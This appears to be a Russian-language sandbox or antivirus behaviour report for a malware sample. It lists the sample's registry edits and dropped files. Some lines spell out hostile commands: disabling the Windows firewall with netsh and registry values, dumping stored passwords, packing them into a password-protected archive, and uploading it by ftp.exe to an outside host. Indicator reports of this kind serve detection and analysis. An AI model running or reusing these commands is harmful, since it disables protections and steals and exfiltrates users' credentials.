Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- %TEMP%\1.tmp\web.bin /stext .dll
- %TEMP%\1.tmp\add.exe c -zinfo 12_40_49 -k a 12_40_49.rar *.dll -psafahi@ x 1.exe *.bin -phicham@
- <SYSTEM32>\ftp.exe -n -s:ftpcmd.dat box12.host1free.com
- <SYSTEM32>\rundll32.exe <SYSTEM32>\shell32.dll,OpenAs_RunDLL c:\HBEDV.KEY
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\Call.bat" "
- <SYSTEM32>\netsh.exe firewall set opmode disable
- %TEMP%\1.tmp\.dll
- %TEMP%\1.tmp\web.bin
- %TEMP%\1.tmp\HBEDV.KEY
- %TEMP%\1.tmp\12_40_49.rar
- %TEMP%\1.tmp\ftpcmd.dat
- %TEMP%\1.tmp\__rar_00.312
- %TEMP%\1.tmp\info
- %TEMP%\1.tmp\1.exe
- %TEMP%\1.tmp\1.bat
- %TEMP%\1.tmp\Call.bat
- %TEMP%\1.tmp\2.bat
- %TEMP%\1.tmp\Hicham.txt
- %TEMP%\1.tmp\cc.bat
- %TEMP%\1.tmp\add.exe
- %TEMP%\1.tmp\add.exe
- %TEMP%\1.tmp\1.exe
- %TEMP%\1.tmp\cc.bat
- %TEMP%\1.tmp\info
- %TEMP%\1.tmp\12_40_49.rar
- %TEMP%\1.tmp\web.bin
- %TEMP%\1.tmp\ftpcmd.dat
- %TEMP%\1.tmp\.dll
- 'localhost':1038
- 'bo###.host1free.com':21
- DNS ASK bo###.host1free.com
- '<IP-адрес в локальной сети>':1036
- ClassName: 'Shell_TrayWnd' WindowName: ''